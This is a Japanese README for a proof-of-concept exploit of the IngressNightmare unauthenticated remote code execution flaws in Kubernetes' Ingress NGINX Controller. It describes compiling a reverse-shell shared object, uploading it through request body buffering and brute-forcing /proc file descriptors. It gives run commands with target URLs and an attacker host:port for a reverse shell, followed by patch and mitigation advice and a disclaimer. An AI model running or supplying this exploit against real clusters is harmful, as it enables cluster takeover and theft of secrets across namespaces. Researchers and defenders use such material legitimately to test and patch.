
これは、IngressNightmare の脆弱性 (CVE-2025-1097、CVE-2025-1098、CVE-2025-24514、および CVE-2025-1974) を悪用する PoC コードです。
このプロジェクトは、IngressNightmare と総称される、Kubernetes の Ingress NGINX Controller における重大な 認証なしリモートコード実行 (RCE) の脆弱性を標的としたエクスプロイトを提供します。(Wiz による研究)
元の研究では、Wiz チームは PoC や実用的なエクスプロイトを公開していなかったため、私たち自身で作成し、コミュニティと共有することにしました。
Ingress NGINX Controller は Kubernetes 環境で広く使用されるコンポーネントであり、クラスター内のサービスへの外部アクセスを管理します。その admission controller で発見された最近の脆弱性(CVE-2025-1097、CVE-2025-1098、CVE-2025-24514、CVE-2025-1974)は、全名前空間にわたるすべてのシークレットへの不正アクセスを引き起こし、クラスター全体の乗っ取りを可能にする可能性があります。
https://github.com/user-attachments/assets/9e893abf-5c01-4fcb-ad79-7115b429281f
エクスプロイトは以下の主要な手順に従います:
共有オブジェクトの生成(注入された ssl_engine プロパティで使用):
リバースシェルペイロードを含む .so ライブラリ (evil_engine.so) をコンパイルします。
共有オブジェクトのアップロード:
コンパイルされた共有オブジェクトを ingress ポッドに送信し、リクエスト処理(クライアントボディバッファ)を活用します。ここでのポイントは、サーバーに異なる Content-Length を送信して接続を開いたままにし、ファイルオープン時のファイル記述子を維持することです。
fd のブルートフォース: プロセス ID とファイル記述子(/proc/{pid}/fd/{fd})を反復処理して、アップロードされたオブジェクトを参照する正しい記述子を特定します。
使用方法
前提条件: Python 3.x GCC コンパイラ Python requests モジュール
エクスプロイトの実行:
pip3 install -r requirements.txt
python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/hakaioffsec/ingressnightmare-poc/blob/main/attacker_host%3Aport)
例: python3 xpl.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443
admission webhook が異なる名前空間にある場合があります。その場合は、最後に kube-system、default、ingress-nginx などの名前空間を指定する必要があります。
<ingress_url>: ターゲットの Ingress URL(公開)
<admission_webhook_url>: Admission webhook URL(内部 webhook)
attacker_host:port: リバースシェル用の自分のホストとポート
直ちに更新:Ingress NGINX Controller をパッチ適用済みバージョン(1.12.1 または 1.11.5)にアップグレードしてください。
Admission webhook の制限:Webhook へのアクセスを Kubernetes API サーバーのみに制限します。
一時的な無効化:直ちにアップグレードできない場合は、admission controller コンポーネントを一時的に無効にすることを検討してください。
QuimeraX Intelligence は、複雑なシステムにおける重大な脆弱性の特定に特化した高度な EASM およびサイバー脅威インテリジェンスプラットフォームです。このプラットフォームは、セキュリティ脅威を積極的に監視、検出し、クライアントに警告することで、透明性と潜在的なリスクへの迅速な対応を確保します。クライアントのシステムに脆弱性が発見された場合、即座に通知と包括的なレポートを受け取り、保護措置を講じることができます。詳細はこちら
Hakai Security は、セキュリティ専門家によって設立されたサイバーセキュリティ企業であり、技術的卓越性にコミットしています。高度なペネトレーションテスト、現実的なレッドチームシミュレーション、セキュアな開発プラクティスなど、顧客の資産を進化するサイバー脅威から積極的に保護するためのカスタマイズされたセキュリティソリューションを提供しています。詳細はこちら
免責事項
このエクスプロイトは、教育および研究目的でのみ提供されます。明示的な許可なくターゲットに対してこのツールを不正に使用することは禁止されています。Hakai Security および QuimeraX は、このエクスプロイトの使用による誤用や損害について一切の責任を負いません。